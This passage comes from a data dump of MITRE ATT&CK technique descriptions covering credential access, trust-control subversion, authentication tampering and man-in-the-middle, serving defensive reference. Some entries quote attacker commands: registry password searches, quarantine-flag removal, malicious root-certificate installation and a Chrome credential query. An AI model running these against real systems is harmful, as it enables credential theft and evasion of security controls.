                              '[Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for '
                              'services that use Kerberos as an authentication mechanism and are used to generate '
                              'tickets to access that particular resource and the system that hosts the resource '
                              '(e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks)\n'
                              '\n'
                              '[Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the '
                              'domain using the Key Distribution Service account KRBTGT account NTLM hash, which '
                              'enables generation of TGTs for any account in Active Directory.(Citation: Campbell '
                              '2014)',
               'name': 'Pass the Ticket',
               'platforms': ['Windows']},
 'T1550.004': {'attack_id': 'T1550.004',
               'categories': ['defense-evasion', 'lateral-movement'],
               'description': 'Adversaries can use stolen session cookies to authenticate to web applications and '
                              'services. This technique bypasses some multi-factor authentication protocols since the '
                              'session is already authenticated.(Citation: Pass The Cookie)\n'
                              '\n'
                              'Authentication cookies are commonly used in web applications, including cloud-based '
                              'services, after a user has authenticated to the service so credentials are not passed '
                              'and re-authentication does not need to occur as frequently. Cookies are often valid for '
                              'an extended period of time, even if the web application is not actively used. After the '
                              'cookie is obtained through [Steal Web Session '
                              'Cookie](https://attack.mitre.org/techniques/T1539), the adversary may then import the '
                              'cookie into a browser they control and is then able to use the site or application as '
                              'the user for as long as the session cookie is active. Once logged into the site, an '
                              'adversary can access sensitive information, read email, or perform actions that the '
                              'victim account has permissions to perform.\n'
                              '\n'
                              'There have been examples of malware targeting session cookies to bypass multi-factor '
                              'authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)',
               'name': 'Web Session Cookie',
               'platforms': ['Office 365', 'SaaS']},
 'T1552': {'attack_id': 'T1552',
           'categories': ['credential-access'],
           'description': 'Adversaries may search compromised systems to find and obtain insecurely stored '
                          'credentials. These credentials can be stored and/or misplaced in many locations on a '
                          'system, including plaintext files (e.g. [Bash '
                          'History](https://attack.mitre.org/techniques/T1552/003)), operating system or '
                          'application-specific repositories (e.g. [Credentials in '
                          'Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized '
                          'files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).',
           'name': 'Unsecured Credentials',
           'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure', 'Office 365', 'Azure AD', 'SaaS']},
 'T1552.001': {'attack_id': 'T1552.001',
               'categories': ['credential-access'],
               'description': 'Adversaries may search local file systems and remote file shares for files containing '
                              'insecurely stored credentials. These can be files created by users to store their own '
                              'credentials, shared credential stores for a group of individuals, configuration files '
                              'containing passwords for a system or service, or source code/binary files containing '
                              'embedded passwords.\n'
                              '\n'
                              'It is possible to extract passwords from backups or saved virtual machines through [OS '
                              'Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) '
                              'Passwords may also be obtained from Group Policy Preferences stored on the Windows '
                              'Domain Controller. (Citation: SRD GPP)\n'
                              '\n'
                              'In cloud environments, authenticated user credentials are often stored in local '
                              'configuration and credential files. In some cases, these files can be copied and reused '
                              'on another machine or the contents can be read and then used to authenticate without '
                              'needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)',
               'name': 'Credentials In Files',
               'platforms': ['Linux', 'macOS', 'Windows', 'AWS', 'GCP', 'Azure']},
 'T1552.002': {'attack_id': 'T1552.002',
               'categories': ['credential-access'],
               'description': 'Adversaries may search the Registry on compromised systems for insecurely stored '
                              'credentials. The Windows Registry stores configuration information that can be used by '
                              'the system or other programs. Adversaries may query the Registry looking for '
                              'credentials and passwords that have been stored for use by other programs or services. '
                              'Sometimes these credentials are used for automatic logons.\n'
                              '\n'
                              'Example commands to find Registry keys related to password information: (Citation: '
                              'Pentestlab Stored Credentials)\n'
                              '\n'
                              '* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>\n'
                              '* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>',
               'name': 'Credentials in Registry',
               'platforms': ['Windows']},
 'T1552.003': {'attack_id': 'T1552.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may search the bash command history on compromised systems for insecurely '
                              'stored credentials. Bash keeps track of the commands users type on the command-line '
                              'with the "history" utility. Once a user logs out, the history is flushed to the user’s '
                              '<code>.bash_history</code> file. For each user, this file resides at the same location: '
                              '<code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 '
                              'commands. Users often type usernames and passwords on the command-line as parameters to '
                              'programs, which then get saved to this file when they log out. Attackers can abuse this '
                              'by looking through the file for potential credentials. (Citation: External to DA, the '
                              'OS X Way)',
               'name': 'Bash History',
               'platforms': ['Linux', 'macOS']},
 'T1552.004': {'attack_id': 'T1552.004',
               'categories': ['credential-access'],
               'description': 'Adversaries may search for private key certificate files on compromised systems for '
                              'insecurely stored credentials. Private cryptographic keys and certificates are used for '
                              'authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia '
                              'Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, '
                              '.gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. \n'
                              '\n'
                              'Adversaries may also look in common key directories, such as <code>~/.ssh</code> for '
                              'SSH keys on * nix-based systems or '
                              '<code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code> on Windows. These private keys '
                              'can be used to authenticate to [Remote '
                              'Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting '
                              'other collected files such as email.\n'
                              '\n'
                              'Adversary tools have been discovered that search compromised systems for file '
                              'extensions relating to cryptographic keys and certificates.(Citation: Kaspersky '
                              'Careto)(Citation: Palo Alto Prince of Persia)\n'
                              '\n'
                              'Some private keys require a password or passphrase for operation, so an adversary may '
                              'also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or '
                              'attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase '
                              'off-line.',
               'name': 'Private Keys',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1552.005': {'attack_id': 'T1552.005',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to access the Cloud Instance Metadata API to collect '
                              'credentials and other sensitive data.\n'
                              '\n'
                              'Most cloud service providers support a Cloud Instance Metadata API which is a service '
                              'provided to running virtual instances that allows applications to access information '
                              'about the running virtual instance. Available information generally includes name, '
                              'security group, and additional metadata including sensitive data such as credentials '
                              'and UserData scripts that may contain additional secrets. The Instance Metadata API is '
                              'provided as a convenience to assist in managing applications and is accessible by '
                              'anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud '
                              'metadata API has been used in at least one high profile compromise.(Citation: Krebs '
                              'Capital One August 2019)\n'
                              '\n'
                              'If adversaries have a presence on the running virtual instance, they may query the '
                              'Instance Metadata API directly to identify credentials that grant access to additional '
                              'resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) '
                              'vulnerability in a public facing web proxy that allows the attacker to gain access to '
                              'the sensitive information via a request to the Instance Metadata API.(Citation: RedLock '
                              'Instance Metadata API 2018)\n'
                              '\n'
                              'The de facto standard across cloud service providers is to host the Instance Metadata '
                              'API at <code>http[:]//169.254.169.254</code>.\n',
               'name': 'Cloud Instance Metadata API',
               'platforms': ['AWS', 'GCP', 'Azure']},
 'T1552.006': {'attack_id': 'T1552.006',
               'categories': ['credential-access'],
               'description': 'Adversaries may attempt to find unsecured credentials in Group Policy Preferences '
                              '(GPP). GPP are tools that allow administrators to create domain policies with embedded '
                              'credentials. These policies allow administrators to set local accounts.(Citation: '
                              'Microsoft GPP 2016)\n'
                              '\n'
                              'These group policies are stored in SYSVOL on a domain controller. This means that any '
                              'domain user can view the SYSVOL share and decrypt the password (using the AES key that '
                              'has been made public).(Citation: Microsoft GPP Key)\n'
                              '\n'
                              'The following tools and scripts can be used to gather and decrypt the password file '
                              'from Group Policy Preference XML files:\n'
                              '\n'
                              '* Metasploit’s post exploitation module: '
                              '<code>post/windows/gather/credentials/gpp</code>\n'
                              '* Get-GPPPassword(Citation: Obscuresecurity Get-GPPPassword)\n'
                              '* gpprefdecrypt.py\n'
                              '\n'
                              'On the SYSVOL share, adversaries may use the following command to enumerate potential '
                              'GPP XML files: <code>dir /s * .xml</code>\n',
               'name': 'Group Policy Preferences',
               'platforms': ['Windows']},
 'T1553': {'attack_id': 'T1553',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may undermine security controls that will either warn users of untrusted '
                          'activity or prevent execution of untrusted programs. Operating systems and security '
                          'products may contain mechanisms to identify programs or websites as possessing some level '
                          'of trust. Examples of such features would include a program being allowed to run because it '
                          'is signed by a valid code signing certificate, a program prompting the user with a warning '
                          'because it has an attribute set from being downloaded from the Internet, or getting an '
                          'indication that you are about to connect to an untrusted site.\n'
                          '\n'
                          'Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will '
                          'depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and '
                          'Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify '
                          'Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these '
                          'controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or '
                          'steal code signing certificates to acquire trust on target systems.(Citation: Securelist '
                          'Digital Certificates)(Citation: Symantec Digital Certificates) ',
           'name': 'Subvert Trust Controls',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1553.001': {'attack_id': 'T1553.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may modify file attributes that signify programs are from untrusted sources '
                              'to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are '
                              'downloaded from the internet, there is a special attribute set on the file called '
                              "<code>com.apple.quarantine</code>. This attribute is read by Apple's Gatekeeper defense "
                              'program at execution time and provides a prompt to the user to allow or deny '
                              'execution. \n'
                              '\n'
                              'Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or '
                              'even from a drive shared over the local network won’t set this flag. Additionally, it '
                              'is possible to avoid setting this flag using [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the '
                              'built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence '
                              'of the quarantine flag can be checked by the xattr command <code>xattr '
                              '/path/to/MyApp.app</code> for <code>com.apple.quarantine</code>. Similarly, given sudo '
                              'access or elevated permission, this attribute can be removed with xattr as well, '
                              '<code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>. (Citation: '
                              'Clearing quarantine attribute) (Citation: OceanLotus for OS X)\n'
                              ' \n'
                              'In typical operation, a file will be downloaded from the internet and given a '
                              'quarantine flag before being saved to disk. When the user tries to open the file or '
                              'application, macOS’s gatekeeper will step in and check for the presence of this flag. '
                              'If it exists, then macOS will then prompt the user to confirmation that they want to '
                              'run the program and will even provide the URL where the application came from. However, '
                              'this is all based on the file being downloaded from a quarantine-savvy application. '
                              '(Citation: Bypassing Gatekeeper)',
               'name': 'Gatekeeper Bypass',
               'platforms': ['macOS']},
 'T1553.002': {'attack_id': 'T1553.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may create, acquire, or steal code signing materials to sign their malware '
                              'or tools. Code signing provides a level of authenticity on a binary from the developer '
                              'and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code '
                              'Signing) The certificates used during an operation may be created, acquired, or stolen '
                              'by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec '
                              'Digital Certificates) Unlike [Invalid Code '
                              'Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in '
                              'a valid signature.\n'
                              '\n'
                              'Code signing to verify software on first run can be used on modern Windows and macOS/OS '
                              'X systems. It is not used on Linux due to the decentralized nature of the platform. '
                              '(Citation: Wikipedia Code Signing) \n'
                              '\n'
                              'Code signing certificates may be used to bypass security policies that require signed '
                              'code to execute on a system. ',
               'name': 'Code Signing',
               'platforms': ['macOS', 'Windows']},
 'T1553.003': {'attack_id': 'T1553.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may tamper with SIP and trust provider components to mislead the operating '
                              'system and application control tools when conducting signature validation checks. In '
                              'user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures '
                              "are used to verify a file's origin and integrity, variables that may be used to "
                              'establish trust in signed code (ex: a driver with a valid Microsoft signature may be '
                              'handled as safe). The signature validation process is handled via the WinVerifyTrust '
                              'application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) '
                              'which accepts an inquiry and coordinates with the appropriate trust provider, which is '
                              'responsible for validating parameters of a signature. (Citation: SpectorOps Subverting '
                              'Trust Sept 2017)\n'
                              '\n'
                              'Because of the varying executable file types and corresponding signature formats, '
                              'Microsoft created software components called Subject Interface Packages (SIPs) '
                              '(Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API '
                              'functions and files. SIPs are responsible for enabling API functions to create, '
                              'retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats '
                              '(Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  '
                              '(Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by '
                              'globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)\n'
                              '\n'
                              'Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may '
                              'abuse this architecture to subvert trust controls and bypass security policies that '
                              'allow only legitimately signed code to execute on a system. Adversaries may hijack SIP '
                              'and trust provider components to mislead operating system and application control tools '
                              'to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting '
                              'Trust Sept 2017)\n'
                              '\n'
                              '* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in '
                              '<code>HKLM\\SOFTWARE[\\WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType '
                              '0\\CryptSIPDllGetSignedDataMsg\\{SIP_GUID}</code> that point to the dynamic link '
                              'library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves '
                              'an encoded digital certificate from a signed file. By pointing to a maliciously-crafted '
                              'DLL with an exported function that always returns a known good signature value (ex: a '
                              'Microsoft signature for Portable Executables) rather than the file’s real signature, an '
                              'adversary can apply an acceptable signature value to all files using that SIP '
                              '(Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, '
                              'invalidating the signature, since the hash returned by the function will not match the '
                              'value computed from the file).\n'
                              '* Modifying the <code>Dll</code> and <code>FuncName</code> Registry values in '
                              '<code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\OID\\EncodingType '
                              '0\\CryptSIPDllVerifyIndirectData\\{SIP_GUID}</code> that point to the DLL providing a '
                              'SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash '
                              'against the signed hash value. By pointing to a maliciously-crafted DLL with an '
                              'exported function that always returns TRUE (indicating that the validation was '
                              'successful), an adversary can successfully validate any file (with a legitimate '
                              'signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without '
                              'hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry '
                              'value could also be redirected to a suitable exported function from an already present '
                              'DLL, avoiding the requirement to drop and execute a new file on disk.\n'
                              '* Modifying the <code>DLL</code> and <code>Function</code> Registry values in '
                              '<code>HKLM\\SOFTWARE\\[WOW6432Node\\]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy\\{trust '
                              'provider GUID}</code> that point to the DLL providing a trust provider’s FinalPolicy '
                              'function, which is where the decoded and parsed signature is checked and the majority '
                              'of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData '
                              'function, this value can be redirected to a suitable exported function from an already '
                              'present DLL or a maliciously-crafted DLL (though the implementation of a trust provider '
                              'is complex).\n'
                              '* **Note:** The above hijacks are also possible without modifying the Registry via [DLL '
                              'Search Order Hijacking](https://attack.mitre.org/techniques/T1038).\n'
                              '\n'
                              'Hijacking SIP or trust provider components can also enable persistent code execution, '
                              'since these malicious components may be invoked by any application that performs code '
                              'signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)',
               'name': 'SIP and Trust Provider Hijacking',
               'platforms': ['Windows']},
 'T1553.004': {'attack_id': 'T1553.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may install a root certificate on a compromised system to avoid warnings '
                              'when connecting to adversary controlled web servers. Root certificates are used in '
                              'public key cryptography to identify a root certificate authority (CA). When a root '
                              'certificate is installed, the system or application will trust certificates in the '
                              "root's chain of trust that have been signed by the root certificate. (Citation: "
                              'Wikipedia Root Certificate) Certificates are commonly used for establishing secure '
                              'TLS/SSL communications within a web browser. When a user attempts to browse a website '
                              'that presents a certificate that is not trusted an error message will be displayed to '
                              'warn the user of the security risk. Depending on the security settings, the browser may '
                              'not allow the user to establish a connection to the website.\n'
                              '\n'
                              'Installation of a root certificate on a compromised system would give an adversary a '
                              'way to degrade the security of that system. Adversaries have used this technique to '
                              'avoid security warnings prompting users when compromised systems connect over HTTPS to '
                              'adversary controlled web servers that spoof legitimate websites in order to collect '
                              'login credentials. (Citation: Operation Emmental)\n'
                              '\n'
                              'Atypical root certificates have also been pre-installed on systems by the manufacturer '
                              'or in the software supply chain and were used in conjunction with malware/adware to '
                              'provide a man-in-the-middle capability for intercepting information transmitted over '
                              'secure TLS/SSL communications. (Citation: Kaspersky Superfish)\n'
                              '\n'
                              'Root certificates (and their associated chains) can also be cloned and reinstalled. '
                              'Cloned certificate chains will carry many of the same metadata characteristics of the '
                              'source and can be used to sign malicious code that may then bypass signature validation '
                              'tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover '
                              'artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)\n'
                              '\n'
                              'In macOS, the Ay MaMi malware uses <code>/usr/bin/security add-trusted-cert -d -r '
                              'trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert</code> to '
                              'install a malicious certificate as a trusted root certificate into the system keychain. '
                              '(Citation: objective-see ay mami 2018)',
               'name': 'Install Root Certificate',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1554': {'attack_id': 'T1554',
           'categories': ['persistence'],
           'description': 'Adversaries may modify client software binaries to establish persistent access to systems. '
                          'Client software enables users to access services provided by a server. Common client '
                          'software types are SSH clients, FTP clients, email clients, and web browsers.\n'
                          '\n'
                          'Adversaries may make modifications to client software binaries to carry out malicious tasks '
                          'when those applications are in use. For example, an adversary may copy source code for the '
                          'client software, add a backdoor, compile for the target, and replace the legitimate '
                          'application binary (or support files) with the backdoored one. Since these applications may '
                          'be routinely executed by the user, the adversary can leverage this for persistent access to '
                          'the host.',
           'name': 'Compromise Client Software Binary',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1555': {'attack_id': 'T1555',
           'categories': ['credential-access'],
           'description': 'Adversaries may search for common password storage locations to obtain user credentials. '
                          'Passwords are stored in several places on a system, depending on the operating system or '
                          'application holding the credentials. There are also specific applications that store '
                          'passwords to make it easier for users manage and maintain. Once credentials are obtained, '
                          'they can be used to perform lateral movement and access restricted information.',
           'name': 'Credentials from Password Stores',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1555.001': {'attack_id': 'T1555.001',
               'categories': ['credential-access'],
               'description': 'Adversaries may collect the keychain storage data from a system to acquire credentials. '
                              "Keychains are the built-in way for macOS to keep track of users' passwords and "
                              'credentials for many services and features such as WiFi passwords, websites, secure '
                              'notes, certificates, and Kerberos. Keychain files are located in '
                              '<code>~/Library/Keychains/</code>,<code>/Library/Keychains/</code>, and '
                              '<code>/Network/Library/Keychains/</code>. (Citation: Wikipedia keychain) The '
                              '<code>security</code> command-line utility, which is built into macOS by default, '
                              'provides a useful way to manage these credentials.\n'
                              '\n'
                              'To manage their credentials, users have to use additional credentials to access their '
                              'keychain. If an adversary knows the credentials for the login keychain, then they can '
                              'get access to all the other credentials stored in this vault. (Citation: External to '
                              'DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon '
                              'credentials.',
               'name': 'Keychain',
               'platforms': ['macOS']},
 'T1555.002': {'attack_id': 'T1555.002',
               'categories': ['credential-access'],
               'description': 'An adversary may obtain root access (allowing them to read securityd’s memory), then '
                              'they can scan through memory to find the correct sequence of keys in relatively few '
                              'tries to decrypt the user’s logon keychain. This provides the adversary with all the '
                              'plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, '
                              'etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)\n'
                              '\n'
                              'In OS X prior to El Capitan, users with root access can read plaintext keychain '
                              'passwords of logged-in users because Apple’s keychain implementation allows these '
                              'credentials to be cached so that users are not repeatedly prompted for passwords. '
                              '(Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd '
                              'utility takes the user’s logon password, encrypts it with PBKDF2, and stores this '
                              'master key in memory. Apple also uses a set of keys and algorithms to encrypt the '
                              'user’s password, but once the master key is found, an attacker need only iterate over '
                              'the other values to unlock the final password.(Citation: OS X Keychain)',
               'name': 'Securityd Memory',
               'platforms': ['Linux', 'macOS']},
 'T1555.003': {'attack_id': 'T1555.003',
               'categories': ['credential-access'],
               'description': 'Adversaries may acquire credentials from web browsers by reading files specific to the '
                              'target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save '
                              'credentials such as website usernames and passwords so that they do not need to be '
                              'entered manually in the future. Web browsers typically store the credentials in an '
                              'encrypted format within a credential store; however, methods exist to extract plaintext '
                              'credentials from web browsers.\n'
                              '\n'
                              'For example, on Windows systems, encrypted credentials may be obtained from Google '
                              'Chrome by reading a database file, <code>AppData\\Local\\Google\\Chrome\\User '
                              'Data\\Default\\Login Data</code> and executing a SQL query: <code>SELECT action_url, '
                              'username_value, password_value FROM logins;</code>. The plaintext password can then be '
                              'obtained by passing the encrypted credentials to the Windows API function '
                              '<code>CryptUnprotectData</code>, which uses the victim’s cached logon credentials as '
                              'the decryption key. (Citation: Microsoft CryptUnprotectData \u200eApril 2018)\n'
                              ' \n'
                              'Adversaries have executed similar procedures for common web browsers such as FireFox, '
                              'Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: '
                              'FireEye HawkEye Malware July 2017)\n'
                              '\n'
                              'Adversaries may also acquire credentials by searching web browser process memory for '
                              'patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n'
                              '\n'
                              'After acquiring credentials from web browsers, adversaries may attempt to recycle the '
                              'credentials across different systems and/or accounts in order to expand access. This '
                              "can result in significantly furthering an adversary's objective in cases where "
                              'credentials gained from web browsers overlap with privileged accounts (e.g. domain '
                              'administrator).',
               'name': 'Credentials from Web Browsers',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1556': {'attack_id': 'T1556',
           'categories': ['credential-access', 'defense-evasion'],
           'description': 'Adversaries may modify authentication mechanisms and processes to access user credentials '
                          'or enable otherwise unwarranted access to accounts. The authentication process is handled '
                          'by mechanisms, such as the Local Security Authentication Server (LSASS) process and the '
                          'Security Accounts Manager (SAM) on Windows or pluggable authentication modules (PAM) on '
                          'Unix-based systems, responsible for gathering, storing, and validating credentials. \n'
                          '\n'
                          'Adversaries may maliciously modify a part of this process to either reveal credentials or '
                          'bypass authentication mechanisms. Compromised credentials or access may be used to bypass '
                          'access controls placed on various resources on systems within the network and may even be '
                          'used for persistent access to remote systems and externally available services, such as '
                          'VPNs, Outlook Web Access and remote desktop. ',
           'name': 'Modify Authentication Process',
           'platforms': ['Windows', 'Linux', 'macOS', 'Network']},
 'T1556.001': {'attack_id': 'T1556.001',
               'categories': ['credential-access', 'defense-evasion'],
               'description': 'Adversaries may patch the authentication process on a domain controller to bypass the '
                              'typical authentication mechanisms and enable access to accounts. \n'
                              '\n'
                              'Malware may be used to inject false credentials into the authentication process on a '
                              'domain controller with the intent of creating a backdoor used to access any user’s '
                              'account and/or credentials (ex: [Skeleton '
                              'Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on '
                              'an enterprise domain controller authentication process (LSASS) with credentials that '
                              'adversaries may use to bypass the standard authentication system. Once patched, an '
                              'adversary can use the injected password to successfully authenticate as any domain user '
                              'account (until the the skeleton key is erased from memory by a reboot of the domain '
                              'controller). Authenticated access may enable unfettered access to hosts and/or '
                              'resources within single-factor authentication environments.(Citation: Dell Skeleton)',
               'name': 'Domain Controller Authentication',
               'platforms': ['Windows']},
 'T1556.002': {'attack_id': 'T1556.002',
               'categories': ['credential-access', 'defense-evasion'],
               'description': 'Adversaries may register malicious password filter dynamic link libraries (DLLs) into '
                              'the authentication process to acquire user credentials as they are validated. \n'
                              '\n'
                              'Windows password filters are password policy enforcement mechanisms for both domain and '
                              'local accounts. Filters are implemented as DLLs containing a method to validate '
                              'potential passwords against password policies. Filter DLLs can be positioned on local '
                              'computers for local accounts and/or domain controllers for domain accounts. Before '
                              'registering new passwords in the Security Accounts Manager (SAM), the Local Security '
                              'Authority (LSA) requests validation from each registered filter. Any potential changes '
                              'cannot take effect until every registered filter acknowledges validation. \n'
                              '\n'
                              'Adversaries can register malicious password filters to harvest credentials from local '
                              'computers and/or entire domains. To perform proper validation, filters must receive '
                              'plain-text credentials from the LSA. A malicious password filter would receive these '
                              'plain-text credentials every time a password request is made.(Citation: Carnal Ownage '
                              'Password Filters Sept 2013)',
               'name': 'Password Filter DLL',
               'platforms': ['Windows']},
 'T1556.003': {'attack_id': 'T1556.003',
               'categories': ['credential-access', 'defense-evasion'],
               'description': 'Adversaries may modify pluggable authentication modules (PAM) to access user '
                              'credentials or enable otherwise unwarranted access to accounts. PAM is a modular system '
                              'of configuration files, libraries, and executable files which guide authentication for '
                              'many services. The most common authentication module is <code>pam_unix.so</code>, which '
                              'retrieves, sets, and verifies account authentication information in '
                              '<code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: '
                              'Man Pam_Unix)(Citation: Red Hat PAM)\n'
                              '\n'
                              'Adversaries may modify components of the PAM system to create backdoors. PAM '
                              'components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary '
                              'adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)\n'
                              '\n'
                              'Malicious modifications to the PAM system may also be abused to steal credentials. '
                              'Adversaries may infect PAM resources with code to harvest user credentials, since the '
                              'values exchanged with PAM components may be plain-text since PAM does not store '
                              'passwords.(Citation: PAM Creds)(Citation: Apple PAM)',
               'name': 'Pluggable Authentication Modules',
               'platforms': ['Linux', 'macOS']},
 'T1556.004': {'attack_id': 'T1556.004',
               'categories': ['credential-access', 'defense-evasion'],
               'description': 'Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) '
                              'to hard code a password in the operating system, thus bypassing of native '
                              'authentication mechanisms for local accounts on network devices.\n'
                              '\n'
                              '[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted '
                              'code to the operating system for network devices to provide access for adversaries '
                              'using a specific password.  The modification includes a specific password which is '
                              'implanted in the operating system image via the patch.  Upon authentication attempts, '
                              'the inserted code will first check to see if the user input is the password. If so, '
                              'access is granted. Otherwise, the implanted code will pass the credentials on for '
                              'verification of potentially valid credentials.(Citation: FireEye - Synful Knock)',
               'name': 'Network Device Authentication',
               'platforms': ['Network']},
 'T1557': {'attack_id': 'T1557',
           'categories': ['credential-access', 'collection'],
           'description': 'Adversaries may attempt to position themselves between two or more networked devices using '
                          'a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network '
                          'Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data '
                          'Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common '
                          'networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, '
                          'etc.), adversaries may force a device to communicate through an adversary controlled system '
                          'so they can collect information or perform additional actions.(Citation: Rapid7 MiTM '
                          'Basics)\n'
                          '\n'
                          'Adversaries may leverage the MiTM position to attempt to modify traffic, such as in '
                          '[Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries '
                          'can also stop traffic from flowing to the appropriate destination, causing denial of '
                          'service.',
           'name': 'Man-in-the-Middle',
           'platforms': ['Windows', 'macOS', 'Linux']},
 'T1557.001': {'attack_id': 'T1557.001',
               'categories': ['credential-access', 'collection'],
               'description': 'By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative '
                              'source for name resolution to force communication with an adversary controlled system. '
                              'This activity may be used to collect or relay authentication materials. \n'
                              '\n'
                              'Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are '
                              'Microsoft Windows components that serve as alternate methods of host identification. '
                              'LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same '
                              'local link to perform name resolution for other hosts. NBT-NS identifies systems on a '
                              'local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet '
                              'NetBIOS)\n'
                              '\n'
                              'Adversaries can spoof an authoritative source for name resolution on a victim network '
                              'by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity '
                              'of the requested host, effectively poisoning the service so that the victims will '
                              'communicate with the adversary controlled system. If the requested host belongs to a '
                              'resource that requires identification/authentication, the username and NTLMv2 hash will '
                              'then be sent to the adversary controlled system. The adversary can then collect the '
                              'hash information sent over the wire through tools that monitor the ports for traffic or '
                              'through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the '
                              'hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to '
                              'obtain the plaintext passwords. In some cases where an adversary has access to a system '
                              'that is in the authentication path between systems or when automated scans that use '
                              'credentials attempt to authenticate to an adversary controlled system, the NTLMv2 '
                              'hashes can be intercepted and relayed to access and execute code against a target '
                              'system. The relay step can happen in conjunction with poisoning but may also be '
                              'independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB '
                              'Relay)\n'
                              '\n'
                              'Several tools exist that can be used to poison name services within local networks such '
                              'as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). '
                              '(Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub '
                              'Responder)',
